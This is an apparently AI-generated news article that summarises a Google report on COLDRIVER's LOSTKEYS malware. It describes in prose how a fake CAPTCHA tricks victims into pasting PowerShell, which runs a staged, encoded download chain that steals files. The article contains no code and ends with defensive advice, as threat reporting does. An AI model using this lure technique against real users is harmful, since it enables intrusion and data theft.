Ethical Hacking News
COLDRIVER, a Russian government-backed threat group, has been linked to a new malware campaign known as LOSTKEYS, which poses a significant threat to Western targets and NGOs. This campaign uses sophisticated social engineering techniques to deliver malware via PowerShell commands, with the primary goal of intelligence collection in support of Russia's strategic interests.
COLDRIVER, a Russian government-backed threat group, has been linked to a new malware campaign known as LOSTKEYS. LOSTKEYS is designed to steal sensitive information from compromised systems and sends system information and running processes to the attacker. The malicious campaign uses a lure website with a fake CAPTCHA to trick users into executing PowerShell commands. COLDRIVER has been targeting Western targets, including current and former advisors to governments, journalists, think tanks, and NGOs, as well as individuals connected to Ukraine. LOSTKEYS poses a significant threat to Western targets and NGOs, requiring them to exercise caution when encountering suspicious sites.
The threat landscape continues to evolve at a rapid pace, with new actors emerging and old ones adapting their tactics. One such actor is COLDRIVER, a Russian government-backed threat group that has been making headlines in recent months. In this article, we will delve into the world of COLDRIVER and explore the malware known as LOSTKEYS, which poses a significant threat to Western targets and NGOs.
The discovery of LOSTKEYS marks a new development in the toolset of COLDRIVER, a group primarily known for credential phishing against high-profile targets. While they have been linked to several notable campaigns targeting officials in the UK and an NGO, this latest malware is designed to achieve a similar goal: stealing sensitive information from compromised systems.
According to Google Threat Intelligence Group (GTIG), LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker. This behavior is reminiscent of other APT actors who have used social engineering techniques to deliver malware via PowerShell commands.
The malicious campaign begins with a lure website featuring a fake CAPTCHA on it. Once the CAPTCHA has been "verified," PowerShell is copied to the user's clipboard, prompting them to execute the script via the "run" prompt in Windows. The first stage of the script fetches and executes the second stage, which is retrieved from a hardcoded address.
Each observed instance of this chain uses unique identifiers that must be present in the request to retrieve the next stage. This step is likely done to evade execution in VMs. The third stage is a Base64-encoded blob, which decodes to more PowerShell. This stage retrieves and decodes the final payload, pulling down two additional files from the same host as the others.
The decoding process uses unique keys per infection chain, which are stored in the "decoder" VBS file. This file contains one of the unique keys and another key is stored in the third stage. The decoder has a substitution cipher on the encoded blob, using these keys to decode it.
In recent months, COLDRIVER has been targeting current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGOs. They have also continued to target individuals connected to Ukraine, with the primary goal of intelligence collection in support of Russia's strategic interests.
The use of LOSTKEYS marks a new development in COLDRIVER's toolkit, one that poses a significant threat to Western targets and NGOs. As such, it is essential for these organizations to exercise caution when encountering sites that prompt them to copy, paste, and execute PowerShell commands.
In addition to the indicators of compromise (IOCs) listed in the post, GTIG has also identified two additional samples dating back to December 2023, which are distinctly different from the execution chain mentioned here. It is currently unclear if these samples from December 2023 are related to COLDRIVER or if the malware was repurposed from a different developer or operation.
As with any emerging threat, it is essential for organizations and individuals to stay vigilant and take proactive measures to protect themselves. This includes using advanced protection programs, enabling Enhanced Safe Browsing for Chrome, and ensuring that all devices are updated.
In conclusion, COLDRIVER's latest malware campaign poses a significant threat to Western targets and NGOs. As such, it is essential for these organizations to exercise caution when encountering sites that prompt them to copy, paste, and execute PowerShell commands. By staying vigilant and taking proactive measures, we can work together to mitigate the impact of this emerging threat.
Related Information:
https://www.ethicalhackingnews.com/articles/COLDRIVER-The-Sophisticated-Malware-Threatening-Western-Targets-and-NGOs-ehn.shtml
https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos/
https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos
https://www.darkreading.com/ics-ot-security/russia-coldriver-apt-unleashes-custom-spica-malware
Published: Wed May 7 10:09:34 2025 by llama3.2 3B Q4_K_M
